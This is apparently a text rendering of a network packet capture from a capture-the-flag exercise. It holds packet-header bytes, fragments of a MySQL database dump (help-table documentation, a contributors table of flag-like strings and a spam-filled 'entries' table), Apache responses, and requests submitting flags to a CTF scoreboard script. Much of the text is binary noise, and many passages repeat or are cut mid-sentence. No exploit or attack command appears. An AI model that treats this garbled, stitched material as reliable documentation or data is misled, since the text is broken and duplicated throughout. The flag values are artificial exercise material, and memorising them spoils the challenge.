all\nrows, but there are practical differences under some circumstances.\n\nFor InnoDB before version 5.0.3, TRUNCATE TABLE is\nmapped to DELETE, so there is no difference. StaClpZZBi0`EL@/Ao0E4@?s6  P?2b!F1 d@7C}pZZ0`BiEL@/!o0pE4@@r6  P?2b!F1 d@7CStbbBi0`ET@/p܂Ao0E<*@?  3P@b  )!one less than the maximum dimension of the two given\ngeometries\n\n --- Their intersection is not equal to either of the two given geometries\n','',''),(254,'TRUNCATE TABLE',6,'TRUNCATE TABLE empties a table completely.\nLogically, this is equivalent to a DELETE statement that deletes all\nrows, but there are practical differences under some circumstances.\n\nFor InnoDB before version 5.0.3, TRUNCATE TABLE is\nmapped to DELETE, so there is no difference. Starting with\nMySQL/InnoDB-5.0.3, fast TRUNCATE TABLE is available. The\noperation is still mapped to DELETE if there are foreign\nkey constraints that reference the table.\n\nFor other storage engines, TRUNCATE TABLE differs from\nDELETE FROM in the following ways from MySQL 4.0 and up:\n\n --- Truncate operations drop and re-create the table, which is much faster\nthan deleting rows one by one.\n --- Truncate operations are not transaction-safe; you get an error if\nyou have an active transaction or an active table lock.\n --- The number of deleted rows is not returned.\n --- As long as the table definition file *tbl_name.frm is\nvalid, the table can be re-created as an empty table with TRUNCATE\nTABLE, even if the data or index files have become corrupted.\n --- The table handler does not remember the last usedCetbb0`BiET@/Ԁo0SE<*@@  3P@b  )!one less than the maximum dimension of the two given\ngeometries\n\n --- Their intersection is not equal to either of the two given geometries\n','',''),(254,'TRUNCATE TABLE',6,'TRUNCATE TABLE empties a table completely.\nLogically, this is equivalent to a DELETE statement that deletes all\nrows, but there are practical differences under some circumstances.\n\nFor InnoDB before version 5.0.3, TRUNCATE TABLE is\nmapped to DELETE, so there is no difference. Starting with\nMySQL/InnoDB-5.0.3, fast TRUNCATE TABLE is available. The\noperation is still mapped to DELETE if there are foreign\nkey constraints that reference the table.\n\nFor other storage engines, TRUNCATE TABLE differs from\nDELETE FROM in the following ways from MySQL 4.0 and up:\n\n --- Truncate operations drop and re-create the table, which is much faster\nthan deleting rows one by one.\n --- Truncate operations are not transaction-safe; you get an error if\nyou have an active transaction or an active table lock.\n --- The number of deleted rows is not returned.\n --- As long as the table definition file *tbl_name.frm is\nvalid, the table can be re-created as an empty table with TRUNCATE\nTABLE, even if the data or index files have become corrupted.\n --- The table handler does not remember the last usedChtbbBi0`ET@/أ  o0E< @?  3PZz{ , _|(AoB7r',3163,'MTNzEwEJAAHrzyIKgh6oEJ1MvAEQ/gfDW5expA==','19828671'),(710314096,'xTexsKPn',2613,'MTNzEwEJAAIKB7p6YsDyE13z0gc/oW57K5v28w==','30898294'),(272965405,'E7SpZgNOx0',719,'MTNzEwEJAAOrvK3oqE8thOd/GHcjuvz/03RFGg==','31682007'),(332502472,'iC0bTHpB',4493,'MTNzEwEJAASY+/cire0VANK87k29MwJQH7At3w==','27065039'),(814940606,'fKAMt2',3496,'MTNzEwEJAAUA5oFnkzgnkNkq7F0s0L8LV96DyQ==','9403493'),(961045704,'Didb2Wcpnk',5196,'MTNzEwEJAAaBPW6A2Oxsz2XOTqlvsOnMHXg2hA==','17675215'),(156517593,'PMoVvAybZ4',2622,'MTNzEwEJAAdyOSo3XMc1ITc9ddyFS7UTn12YBg==','10218161'),(86747720,'yeDTFc',4251,'MTNzEwEJAAjGdJRTYDiMF/BBFPxz3CP+SA6MTg==','31716909'),(331960129,'dWG275w1oOi',823,'MTNzEwEJAAnhtsyB3wJSxnuM+ynGzlrSjkDHqw==','16338822'),(744978398,'yJ0AfCX',604,'MTNzEwEJAArKsRxWWIXBUN2eFWTyNLAWBKW1zQ==','38168282'),(909074458,'I95SuheAOD',3039,'MTNzEwEJAAtYe3c1yxxc72QXnhq+X/kC4Qqhew==','15100544'),(251641537,'Dzk6DS',1010,'MTNzEwEJAAwPiXAT/JPanv0mKSxwT2BCI+P0Jg==','33550740'),(617501166,'IJRoowqby',3267,'MTNzEwEJAA1sxgv8O57qqGPEt2ajsWM3ebT2Qg==','14992743'),(300961067,'9PNQIikl',2384,'MTNzEwEJAA5F1O61QQAVaDdm5XNw9OW8WF16nA==','22489160'),(780013234,'MaPQCT49',1503,'MTNzEwEJAA/VO/37pWQ8O4ZYFQHeeYnB8ZE0QA==','36095669'),(613788964,'A73jwkm8B9',1097,'MTNzEwEJABDFtjAemjoL5OhClSvHAdnFiHFQ4w==','Cxtbb0`BiET@/Ԁo0SE< @@  3PZz{ , _|(AoB7r',3163,'MTNzEwEJAAHrzyIKgh6oEJ1MvAEQ/gfDW5expA==','19828671'),(710314096,'xTexsKPn',2613,'MTNzEwEJAAIKB7p6YsDyE13z0gc/oW57K5v28w==','30898294'),(272965405,'E7SpZgNOx0',719,'MTNzEwEJAAOrvK3oqE8thOd/GHcjuvz/03RFGg==','31682007'),(332502472,'iC0bTHpB',4493,'MTNzEwEJAASY+/cire0VANK87k29MwJQH7At3w==','27065039'),(814940606,'fKAMt2',3496,'MTNzEwEJAAUA5oFnkzgnkNkq7F0s0L8LV96DyQ==','9403493'),(961045704,'Didb2Wcpnk',5196,'MTNzEwEJAAaBPW6A2Oxsz2XOTqlvsOnMHXg2hA==','17675215'),(156517593,'PMoVvAybZ4',2622,'MTNzEwEJAAdyOSo3XMc1ITc9ddyFS7UTn12YBg==','10218161'),(86747720,'yeDTFc',4251,'MTNzEwEJAAjGdJRTYDiMF/BBFPxz3CP+SA6MTg==','31716909'),(331960129,'dWG275w1oOi',823,'MTNzEwEJAAnhtsyB3wJSxnuM+ynGzlrSjkDHqw==','16338822'),(744978398,'yJ0AfCX',604,'MTNzEwEJAArKsRxWWIXBUN2eFWTyNLAWBKW1zQ==','38168282'),(909074458,'I95SuheAOD',3039,'MTNzEwEJAAtYe3c1yxxc72QXnhq+X/kC4Qqhew==','15100544'),(251641537,'Dzk6DS',1010,'MTNzEwEJAAwPiXAT/JPanv0mKSxwT2BCI+P0Jg==','33550740'),(617501166,'IJRoowqby',3267,'MTNzEwEJAA1sxgv8O57qqGPEt2ajsWM3ebT2Qg==','14992743'),(300961067,'9PNQIikl',2384,'MTNzEwEJAA5F1O61QQAVaDdm5XNw9OW8WF16nA==','22489160'),(780013234,'MaPQCT49',1503,'MTNzEwEJAA/VO/37pWQ8O4ZYFQHeeYnB8ZE0QA==','36095669'),(613788964,'A73jwkm8B9',1097,'MTNzEwEJABDFtjAemjoL5OhClSvHAdnFiHFQ4w==','CMuZZBi0`EL@/Ao0E4@?s4  P?2j!A' dA8CguZZ0`BiEL@/!o0pE4@@r4  P?2j!A' dA8CxbbBi0`ET@/p܂Ao0E<*@?  3PEb  )! AUTO_INCREMENT\nvalue, but starts counting from the beginning. This is true even for\nMyISAM and InnoDB, which normally does not reuse sequence values.\n\nIn MySQL 3.23, TRUNCATE TABLE is mapped to\nCOMMIT; DELETE FROM tbl_name, so it behaves like DELETE.\nSee also : [DELETE, , DELETE].\n\nTRUNCATE TABLE is an Oracle SQL extension.\nThis statement was added in MySQL 3.23.28, although from 3.23.28\nto 3.23.32, the keyword TABLE must be omitted.\n','TRUNCATE TABLE tbl_name',''),(255,'CURRENT_DATE',14,' CURRENT_DATE\n CURRENT_DATE()\n\nCURRENT_DATE and CURRENT_DATE() are synonyms for\nCURDATE().\n','',''),(256,'BIT_XOR',12,' BIT_XOR(expr)\nReturns the bitwise XOR of all bits in expr. The calculation is\nperformed with 64-bit (BIGINT) precision.\n','',''),(257,'AREA',0,' Area(poly)\nReturns as a double-precision number the area of the Polygon value\npoly, as measured in its spatial reference system.\n','mysql> SET @poly = \'Polygon((0 0,0 3,3 0,0 0),(1 1,1 2,2 1,1 1))\';\nmysql> SELECT Area(GeomFromText(@poly));\n+---------------------------+\n| Area(GeomFromText(@poly)) |\n+---------------------------+\n| 4 |\n+---------------------------+',''),(258,'START SLAVE',7,'START SLAVE [thread_type [, thread_type] ... ]\nSTART SLAVE [SQL_THREADCxbbBi0`ET@/u܂Ao0E<@?%x  3Pɢn  )"Cxbb0`BiET@/Ԁo0SE<*@@  3PEb  )! AUTO_INCREMENT\nvalue, but starts counting from the beginning. This is true even for\nMyISAM and InnoDB, which normally does not reuse sequence values.\n\nIn MySQL 3.23, TRUNCATE TABLE is mapped to\nCOMMIT; DELETE FROM tbl_name, so it behaves like DELETE.\nSee also : [DELETE, , DELETE].\n\nTRUNCATE TABLE is an Oracle SQL extension.\nThis statement was added in MySQL 3.23.28, although from 3.23.28\nto 3.23.32, the keyword TABLE must be omitted.\n','TRUNCATE TABLE tbl_name',''),(255,'CURRENT_DATE',14,' CURRENT_DATE\n CURRENT_DATE()\n\nCURRENT_DATE and CURRENT_DATE() are synonyms for\nCURDATE().\n','',''),(256,'BIT_XOR',12,' BIT_XOR(expr)\nReturns the bitwise XOR of all bits in expr. The calculation is\nperformed with 64-bit (BIGINT) precision.\n','',''),(257,'AREA',0,' Area(poly)\nReturns as a double-precision number the area of the Polygon value\npoly, as measured in its spatial reference system.\n','mysql> SET @poly = \'Polygon((0 0,0 3,3 0,0 0),(1 1,1 2,2 1,1 1))\';\nmysql> SELECT Area(GeomFromText(@poly));\n+---------------------------+\n| Area(GeomFromText(@poly)) |\n+---------------------------+\n| 4 |\n+---------------------------+',''),(258,'START SLAVE',7,'START SLAVE [thread_type [, thread_type] ... ]\nSTART SLAVE [SQL_THREADCxbb0`BiET@/Ԁo0SE<@@$x  3Pɢn  )"C~ZZBi0`EL@/Ao0E4@?s2  P?2r!< dD8C~ZZ0`BiEL@/!o0pE4@@r2  P?2r!< dD8CBi0`E@/Sŀo0E]@?  sPk$i Lړ 67=w]GET /cgi-bin/submitflag.py?flag=MTNzExMIACu%2F2VfM23XgeeOGPQPNkoeklDIzuQ%3D%3D HTTP/1.0 CʪBiE@/o0o0oE]@@  sPk$i Lړ 67=w]GET /cgi-bin/submitflag.py?flag=MTNzExMIACu%2F2VfM23XgeeOGPQPNkoeklDIzuQ%3D%3D HTTP/1.0 CZZBi0`EL@/܂Sŀo0E4S8@?G 3 PtW'tOb )1vC ZZBiʪEL@/o0oo0E4@@ Ps$i ĀS 7=x6C"ZZ0`BiEL@/go0AE4S8@@G 3 PtW'tOb )1vC3ZZ0`BiEL@/܀o0SE4@@ Ps$i ĀS 7=x6CZZBi0`EL@/Ao0E4@?s0  P?2z!7 dE8CZZ0`BiEL@/!o0pE4@@r0  P?2z!7 dE8C/bbBi0`ET@/أ  o0E< @?  3PZ{ c _(17272362'),(362870354,'pVXt4Y5',2417,'MTNzEwEJABFB6yQOxW9Ii0BuqNopAClTlwo2Tg==','29849801'),(77909691,'ybxFzq3nw',3525,'MTNzEwEJABL3Jl1LJdstdnlbQAL+WEoDLKAJVw==','27265109'),(266032309,'T0uuLrkhuyb',3540,'MTNzEwEJABNNV6v6PDzfODq1nrYXnirCL2wCqA==','16853970'),(324440356,'MZzyTY',786,'MTNzEwEJABSu2yxPwyAIJM67ViZbopXP/jfCcQ==','34226985'),(137173338,'Vbid4DPfTcz',4109,'MTNzExEJADCiLPQon0teeewYjkRfziOGX/1DhQ==','17669797'),(834994030,'1',1,'1','1'),(233294773,'5RwVUwJp',2558,'MTNzExEJADF7RhOEu3aTE4sBIaBHZU9ptczf0Q==','39175280'),(29942851,'zYBqcRosnfA',1960,'MTNzExEJADJ5XSFEnyZfzhUA2LRGGQ+GAveu1Q==','29329539'),(139295855,'fbMWymzI',2749,'MTNzExEJADPrsD+e0Gt2N6DDTcC/p/juFZpI2g==','25697572'),(977741268,'R86Wr2',4064,'MTNzExEJADRSwuCS0VSmwTdjipmkx1T0xI0DPw==','24805698'),(651364602,'nTz6Cx',615,'MTNzExEJADUhPPlIOyJ7NeqGtZ05f/tGqorPiA==','26765832'),(628790650,'2QJSJpZH',3610,'MTNzExEJADas1n6OBzGG8pvmbh3ZSHjLgktEkA==','13700268'),(274662051,'tKhysZLzw',4845,'MTNzExEJADepDtoKLy3C7UyQ2IlA+6Nxs48/UA==','23545622'),(566514464,'RxEz9paEZ5',2137,'MTNzExEJADhXwXxWf4VttRsZhfp8t2mRDr8Zmg==','25771219'),(404384701,'2FyPHzwOXp',1667,'MTNzExEJADn4XSmuavS7Kc0Y2vMONGKOS65CmA==','39216737'),(114397309,'KMG4AN1Rs3',4263,'MTNzExEJADpfNnMDolU4YTLMNWVW6/PDZc329w==','29664211'),(98955963,'7FeACJbb0`BiET@/Ԁo0SE< @@  3PZ{ c _(17272362'),(362870354,'pVXt4Y5',2417,'MTNzEwEJABFB6yQOxW9Ii0BuqNopAClTlwo2Tg==','29849801'),(77909691,'ybxFzq3nw',3525,'MTNzEwEJABL3Jl1LJdstdnlbQAL+WEoDLKAJVw==','27265109'),(266032309,'T0uuLrkhuyb',3540,'MTNzEwEJABNNV6v6PDzfODq1nrYXnirCL2wCqA==','16853970'),(324440356,'MZzyTY',786,'MTNzEwEJABSu2yxPwyAIJM67ViZbopXP/jfCcQ==','34226985'),(137173338,'Vbid4DPfTcz',4109,'MTNzExEJADCiLPQon0teeewYjkRfziOGX/1DhQ==','17669797'),(834994030,'1',1,'1','1'),(233294773,'5RwVUwJp',2558,'MTNzExEJADF7RhOEu3aTE4sBIaBHZU9ptczf0Q==','39175280'),(29942851,'zYBqcRosnfA',1960,'MTNzExEJADJ5XSFEnyZfzhUA2LRGGQ+GAveu1Q==','29329539'),(139295855,'fbMWymzI',2749,'MTNzExEJADPrsD+e0Gt2N6DDTcC/p/juFZpI2g==','25697572'),(977741268,'R86Wr2',4064,'MTNzExEJADRSwuCS0VSmwTdjipmkx1T0xI0DPw==','24805698'),(651364602,'nTz6Cx',615,'MTNzExEJADUhPPlIOyJ7NeqGtZ05f/tGqorPiA==','26765832'),(628790650,'2QJSJpZH',3610,'MTNzExEJADas1n6OBzGG8pvmbh3ZSHjLgktEkA==','13700268'),(274662051,'tKhysZLzw',4845,'MTNzExEJADepDtoKLy3C7UyQ2IlA+6Nxs48/UA==','23545622'),(566514464,'RxEz9paEZ5',2137,'MTNzExEJADhXwXxWf4VttRsZhfp8t2mRDr8Zmg==','25771219'),(404384701,'2FyPHzwOXp',1667,'MTNzExEJADn4XSmuavS7Kc0Y2vMONGKOS65CmA==','39216737'),(114397309,'KMG4AN1Rs3',4263,'MTNzExEJADpfNnMDolU4YTLMNWVW6/PDZc329w==','29664211'),(98955963,'7FeAC#bbBiBaET@/^o0 o0E<9@)d Y P* qЛ G4CAbbʪBiET@/o0o0oE<9@@c Y P* qМU G4CZZBi0`EL@/܂Sŀo0E4S:@?E 3 PtWɀ'tEM )2zCbbBiʪET@/o0oo0E<@@$Y YPճ* r@h. 7=xG4CZZ0`BiEL@/go0AE4S:@@E 3 PtWɀ'tEM )2zC͑bbBaBiET@/^o0o0 E<@@$Y YPճ* r@h 7=xG4CZZBiBaEL@/fo0 o0E49@)j Y P* rմi G47=xC)ZZʪBiEL@/o0o0oE49@@i Y P* rմi G47=xCZZBi0`EL@/< o0E4 @?"  gPa8Zn }^WCZZ0`BiEL@/o0  E4 @@"  gPa8Zn }^WCZZBi0`EL@/܂Sŀo0E4S<@?C 3 PtWـ't;< )3zC ZZ0`BiEL@/go0AE4S<@@C 3 PtWـ't;< )3zCZZBi0`EL@/Ao0E4@?s.  P?2!, dK9CZZ0`BiEL@/!o0pE4@@r.  P?2!, dK9CӜZZBi0`EL@/a@?A 3 PtW%'t1' )3Cءbb0`BiET@/Ԁo0SE< @@  3PZ{ ^ _(4IU',4857,'MTNzExEJADuG5A6ujRzFfhAbea24BADDkSRU+Q==','32129136'),(870811604,'t2s1br56',3247,'MTNzExEJADxXQsL0sB2coW0LFHl3fpbsOEM16Q==','30483635'); UNLOCK TABLES; /*!40000 ALTER TABLE `contributors` ENABLE KEYS */; -- -- Current Database: `Public` -- CREATE DATABASE /*!32312 IF NOT EXISTS*/ `Public` /*!40100 DEFAULT CHARACTER SET latin1 */; USE `Public`; -- -- Table structure for table `entries` -- DROP TABLE IF EXISTS `entries`; CREATE TABLE `entries` ( `id` int(8) NOT NULL auto_increment, `author` varchar(24) default NULL, `text` text, `score` int(11) default NULL, PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1; -- -- Dumping data for table `entries` -- /*!40000 ALTER TABLE `entries` DISABLE KEYS */; LOCK TABLES `entries` WRITE; INSERT INTO `entries` VALUES (1,'Sir Spamm','For sale: Remove List: list of addresses you should not mail to. These are addresses that were returned undeliverable and of people who wanted to be removed from e-mailing list through out the internet. These list also include flamers, those people who find it amusing to complaing to ISP and get your account deleted - Price: $75 for 200,000',312),(2,'Frank Young','If you are a time traveler or alien disguised as human and or have the technology to travel physically thCZZ0`BiEL@/go0AE4S>@@A 3 PtW%'t1' )3CZZBi0`EL@/Ao0E4@?s,  P?2Ě!" dM:CȢZZ0`BiEL@/!o0pE4@@r,  P?2Ě!" dM:CZZBi0`EL@/Ao0E4@?s*  P?2Ϊ! dO;CZZ0`BiEL@/!o0pE4@@r*  P?2Ϊ! dO;CMZZBi0`EL@/܂Sŀo0E4S@@?? 3 PtW/'t' )4CfZZ0`BiEL@/go0AE4S@@@? 3 PtW/'t' )4CAZZBi0`EL@/Ao0E4@?s(  P?2غ! dQ 404 Not Found

Not Found

The requested URL /favicon.ico was not found on this server.


Apache/2.0.54 (Debian GNU/Linux) mod_python/3.1.3 Python/2.3.5 PHP/4.4.0-4 mod_perl/2.0.1 Perl/v5.8.7 Server at 10.5.1.3 Port 80
CwwBi0`Ei@/tIo0EQ:@?  PG] e;HTTP/1.1 200 OK Date: Sun, 09 Dec 2018 19:27:14 GMT Server: Apache/2.0.54 (Debian GNU/Linux) mod_python/3.1.3 Python/2.3.5 PHP/4.4.0-4 mod_perl/2.0.1 Perl/v5.8.7 X-Powered-By: PHP/4.4.0-4 Connection: close Transfer-Encoding: chunked Content-Type: text/html e C0`BiE@/C o0lES@@0  kP 0j-HP!6HTTP/1.1 404 Not Found Date: Sun, 09 Dec 2018 19:45:30 GMT Server: Apache/2.0.54 (Debian GNU/Linux) mod_python/3.1.3 Python/2.3.5 PHP/4.4.0-4 mod_perl/2.0.1 Perl/v5.8.7 Content-Length: 362 Keep-Alive: timeout=15, max=98 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 404 Not Found

Not Found

The requested URL /favicon.ico was not found on this server.


Apache/2.0.54 (Debian GNU/Linux) mod_python/3.1.3 Python/2.3.5 PHP/4.4.0-4 mod_perl/2.0.1 Perl/v5.8.7 Server at 10.5.1.3 Port 80
Cww0`BiEi@/o0 EQ:@@  PG] e;HTTP/1.1 200 OK Date: Sun, 09 Dec 2018 19:27:14 GMT Server: Apache/2.0.54 (Debian GNU/Linux) mod_python/3.1.3 Python/2.3.5 PHP/4.4.0-4 mod_perl/2.0.1 Perl/v5.8.7 X-Powered-By: PHP/4.4.0-4 Connection: close Transfer-Encoding: chunked Content-Type: text/html e CkkBiʪE]@/o0oo0EEH@@ Pj<`+]  7=x( HTTP/1.0 200 OK Ckk0`BiE]@/+o0 EEH@@ Pj<`+]  7=x( HTTP/1.0 200 OK C~ZZBi0`EL@/܂Sŀo0E4SJ@?5 3 PtWbI't )8CZZ0`BiEL@/go0AE4SJ@@5 3 PtWbI't )8CsKKBiʪE=@/&o0oo0E%H@@ PjCTF Flag Submission

Error submitting flag

You have submitted this flag before. Try to find a new flag instead.


Try again, enter your flag here:

CKK0`BiE=@/Ko0 E%H@@ PjCTF Flag Submission

Error submitting flag

You have submitted this flag before. Try to find a new flag instead.


Try again, enter your flag here:

CZbbBi0`ET@/p܂Ao0E 7)*rting with\nMySQL/InnoDB-5.0.3, fast TRUNCATE TABLE is available. The\noperation is still mapped to DELETE if there are foreign\nkey constraints that reference the table.\n\nFor other storage engines, TRUNCATE TABLE differs from\nDELETE FROM in the following ways from MySQL 4.0 and up:\n\n --- Truncate operations drop and re-create the table, which is much faster\nthan deleting rows one by one.\n --- Truncate operations are not transaction-safe; you get an error if\nyou have an active transaction or an active table lock.\n --- The number of deleted rows is not returned.\n --- As long as the table definition file *tbl_name.frm is\nvalid, the table can be re-created as an empty table with TRUNCATE\nTABLE, even if the data or index files have become corrupted.\n --- The table handler does not remember the last used AUTO_INCREMENT\nvalue, but starts counting from the beginning. This is true even for\nMyISAM and InnoDB, which normally does not reuse sequence values.\n\nIn MySQL 3.23, TRUNCATE TABLE is mapped to\nCOMMIT; DELETE FROM tbl_name, so it behaves like DELETE.\nSee also : [DELETE, , DELETE].\n\nTRUNCATE TABLE is an Oracle SQL extension.\nThis statement was added in MySQL 3.23.28, although from 3.23.28\nto 3.23.32, the keyword TABLE must be omitted.\n','TRUNCATE CcZZBi0`EL@/Ao0E4@?s  P?2!n d`ACjZZBi0`EL@/܂Sŀo0E4SL@?3 3 PtWlY't )8Cbb0`BiET@/Ԁo0SE 7)*rting with\nMySQL/InnoDB-5.0.3, fast TRUNCATE TABLE is available. The\noperation is still mapped to DELETE if there are foreign\nkey constraints that reference the table.\n\nFor other storage engines, TRUNCATE TABLE differs from\nDELETE FROM in the following ways from MySQL 4.0 and up:\n\n --- Truncate operations drop and re-create the table, which is much faster\nthan deleting rows one by one.\n --- Truncate operations are not transaction-safe; you get an error if\nyou have an active transaction or an active table lock.\n --- The number of deleted rows is not returned.\n --- As long as the table definition file *tbl_name.frm is\nvalid, the table can be re-created as an empty table with TRUNCATE\nTABLE, even if the data or index files have become corrupted.\n --- The table handler does not remember the last used AUTO_INCREMENT\nvalue, but starts counting from the beginning. This is true even for\nMyISAM and InnoDB, which normally does not reuse sequence values.\n\nIn MySQL 3.23, TRUNCATE TABLE is mapped to\nCOMMIT; DELETE FROM tbl_name, so it behaves like DELETE.\nSee also : [DELETE, , DELETE].\n\nTRUNCATE TABLE is an Oracle SQL extension.\nThis statement was added in MySQL 3.23.28, although from 3.23.28\nto 3.23.32, the keyword TABLE must be omitted.\n','TRUNCATE CZZ0`BiEL@/!o0pE4@@r  P?2!n d`ACZZ0`BiEL@/go0AE4SL@@3 3 PtWlY't )8C/NNBi0`E@@/Plo0E(@@b k  P]/@sP%CJNN0`BiE@@/X:o0E(@@@ k  P]/@sP%CZZBi0`EL@/܂Sŀo0E4@? 3 P{"l+" )9CZZ0`BiEL@/go0AE4@@ 3 P{"l+" )9CbbBi0`ET@/p܂Ao0E<*@?  3PJb TF :)+] UNTIL\n MASTER_LOG_FILE = \'log_name\', MASTER_LOG_POS = log_pos\nSTART SLAVE [SQL_THREAD] UNTIL\n RELAY_LOG_FILE = \'log_name\', RELAY_LOG_POS = log_pos\n\nthread_type: IO_THREAD | SQL_THREAD\n\nSTART SLAVE with no options starts both of the slave threads.\nThe I/O thread reads queries from the master server and stores them in the\nrelay log. The SQL thread reads the relay log and executes the\nqueries.\nSTART SLAVE requires the SUPER privilege.\n\nIf START SLAVE succeeds in starting the slave threads, it\nreturns without any error. However, even in that case, it might be that the slave\nthreads start and then later stop (for example, because they don\'t manage to\nconnect to the master or read its binary logs, or some other\nproblem). START SLAVE does not warn you about this. You must\ncheck your slave\'s error log for error messages generated by\nthe slave threads, or check that they are running fine with SHOW\nSLAVE STATUS.\n','',''),(259,'FLUSH',6,'You should use the FLUSH statement if you want to clear some of the\ninternal caches MySQL uses. To execute FLUSH, you must have\nthe RELOAD privilege.\n','FLUSH [LOCAL | NO_WRITE_TO_BINLOG] flush_option [, flush_option] ...',''),(260,'DESCRIBE',7,'{DESCRIBE | DESC} tbl_name [col_name | wild]\n\nDESCRIBE provCbb0`BiET@/Ԁo0SE<*@@  3PJb TF :)+] UNTIL\n MASTER_LOG_FILE = \'log_name\', MASTER_LOG_POS = log_pos\nSTART SLAVE [SQL_THREAD] UNTIL\n RELAY_LOG_FILE = \'log_name\', RELAY_LOG_POS = log_pos\n\nthread_type: IO_THREAD | SQL_THREAD\n\nSTART SLAVE with no options starts both of the slave threads.\nThe I/O thread reads queries from the master server and stores them in the\nrelay log. The SQL thread reads the relay log and executes the\nqueries.\nSTART SLAVE requires the SUPER privilege.\n\nIf START SLAVE succeeds in starting the slave threads, it\nreturns without any error. However, even in that case, it might be that the slave\nthreads start and then later stop (for example, because they don\'t manage to\nconnect to the master or read its binary logs, or some other\nproblem). START SLAVE does not warn you about this. You must\ncheck your slave\'s error log for error messages generated by\nthe slave threads, or check that they are running fine with SHOW\nSLAVE STATUS.\n','',''),(259,'FLUSH',6,'You should use the FLUSH statement if you want to clear some of the\ninternal caches MySQL uses. To execute FLUSH, you must have\nthe RELOAD privilege.\n','FLUSH [LOCAL | NO_WRITE_TO_BINLOG] flush_option [, flush_option] ...',''),(260,'DESCRIBE',7,'{DESCRIBE | DESC} tbl_name [col_name | wild]\n\nDESCRIBE provCBi0`E@/" <o0E{2@?O  Pհfـ + 1T7=w;HTTP/1.1 200 OK Date: Sun, 09 Dec 2018 18:30:36 GMT Server: Apache/2.0.54 (Debian GNU/Linux) mod_python/3.1.3 Python/2.3.5 PHP/4.4.0-4 mod_perl/2.0.1 Perl/v5.8.7 X-Powered-By: PHP/4.4.0-4 Content-Encoding: gzip Vary: Accept-Encoding Content-Length: 278 Connection: close Content-Type: text/xml mPMO0+p!l/R!d/GSddIJ믷Y2͛~ tmPXuQ?$H;r'IMo?! o:M OYCwjb-|[oK_k1sbGCeGehO#gP,L84ҧqRgwXd6R!g`EѝdzBEŗnCʪBiE@/Ѐo0o0oE{2@@O7  Pհfـ ,8 1T7=w;HTTP/1.1 200 OK Date: Sun, 09 Dec 2018 18:30:36 GMT Server: Apache/2.0.54 (Debian GNU/Linux) mod_python/3.1.3 Python/2.3.5 PHP/4.4.0-4 mod_perl/2.0.1 Perl/v5.8.7 X-Powered-By: PHP/4.4.0-4 Content-Encoding: gzip Vary: Accept-Encoding Content-Length: 278 Connection: close Content-Type: text/xml mPMO0+p!l/R!d/GSddIJ믷Y2͛~ tmPXuQ?$H;r'IMo?! o:M OYCwjb-|[oK_k1sbGCeGehO#gP,L84ҧqRgwXd6R!g`EѝdzBEŗnCuZZBi0`EL@/܂Sŀo0E4@? 3 P"l& )9CZZ0`BiEL@/go0AE4@@ 3 P"l& )9ChbbBi0`ET@/p܂Ao0E<6@?  3P  :)+SS\' format, but allows you\nto assign values to DATETIME columns using either strings or numbers.\n','',''),(13,'LOWER',23,' LOWER(str)\nReturns the string str with all characters changed to lowercase\naccording to the current character set mapping (the default is ISO-8859-1\nLatin1).\n','mysql> SELECT LOWER(\'QUADRATICALLY\');\n -> \'quadratically\'',''),(14,'MONTH',14,' MONTH(date)\nReturns the month for date, in the range 1 to 12.\n','mysql> SELECT MONTH(\'1998-02-03\');\n -> 2',''),(15,'TINYINT',1,' TINYINT[(M)] [UNSIGNED] [ZEROFILL]\n\nA very small integer. The signed range is -128 to 127. The\nunsigned range is 0 to 255.\n','',''),(16,'ISCLOSED',18,' IsClosed(ls)\nReturns 1 if the LineString value ls is closed\n(that is, its StartPoint() and EndPoint() values are the same).\nReturns 0 if ls is not closed, and -1 if it is NULL.\n','mysql> SET @ls = \'LineString(1 1,2 2,3 3)\';\nmysql> SELECT IsClosed(GeomFromText(@ls));\n+-----------------------------+\n| IsClosed(GeomFromText(@ls)) |\n+-----------------------------+\n| 0 |\n+-----------------------------+',''),(17,'MASTER_POS_WAIT',21,' MASTER_POS_WAIT(log_name,log_pos[,timeout])\n\nThis function is useful for control of master/slave synchronization.\nIt blocks CrZZBiʪEL@/o0oo0E4@@ հP킭_ 7=x.1TCbb0`BiET@/Ԁo0SE<6@@  3P  :)+SS\' format, but allows you\nto assign values to DATETIME columns using either strings or numbers.\n','',''),(13,'LOWER',23,' LOWER(str)\nReturns the string str with all characters changed to lowercase\naccording to the current character set mapping (the default is ISO-8859-1\nLatin1).\n','mysql> SELECT LOWER(\'QUADRATICALLY\');\n -> \'quadratically\'',''),(14,'MONTH',14,' MONTH(date)\nReturns the month for date, in the range 1 to 12.\n','mysql> SELECT MONTH(\'1998-02-03\');\n -> 2',''),(15,'TINYINT',1,' TINYINT[(M)] [UNSIGNED] [ZEROFILL]\n\nA very small integer. The signed range is -128 to 127. The\nunsigned range is 0 to 255.\n','',''),(16,'ISCLOSED',18,' IsClosed(ls)\nReturns 1 if the LineString value ls is closed\n(that is, its StartPoint() and EndPoint() values are the same).\nReturns 0 if ls is not closed, and -1 if it is NULL.\n','mysql> SET @ls = \'LineString(1 1,2 2,3 3)\';\nmysql> SELECT IsClosed(GeomFromText(@ls));\n+-----------------------------+\n| IsClosed(GeomFromText(@ls)) |\n+-----------------------------+\n| 0 |\n+-----------------------------+',''),(17,'MASTER_POS_WAIT',21,' MASTER_POS_WAIT(log_name,log_pos[,timeout])\n\nThis function is useful for control of master/slave synchronization.\nIt blocks CZZ0`BiEL@/To0<E4@@x  հP킭^p 7=x.1TC bbBi0`ET@/p܂Ao0E<6@?  3P  :)+until the slave has read and applied all updates up to the specified\nposition in the master log.\nThe return value is the number of log events it had to wait for to get to\nthe specified position. The function returns NULL if the slave SQL thread\nis not started, the slave\'s master information is not initialized, the\narguments are incorrect, or an error occurs. It returns -1 if the\ntimeout has been exceeded. If the slave SQL thread stops while\nMASTER_POS_WAIT() is waiting, the function returns NULL.\nIf the slave is past the specified position, the function returns\nimmediately.\n','SELECT MASTER_POS_WAIT(\'master_log_file\', master_log_pos)',''),(18,'^',27,' ^\nBitwise XOR:\n','mysql> SELECT 1 ^ 1;\n -> 0\nmysql> SELECT 1 ^ 0;\n -> 1\nmysql> SELECT 11 ^ 3;\n -> 8',''),(19,'DROP VIEW',24,'DROP VIEW removes one or more views. You must have the DROP\nprivilege for each view.\n\nYou can use the keywords IF EXISTS to prevent an error from occurring\nfor views that don\'t exist. When this clause is given, a NOTE is\ngenerated for each non-existent view.\nSee also : [SHOW WARNINGS, , SHOW WARNINGS].\n\nRESTRICT and CASCADE, if given, are parsed and 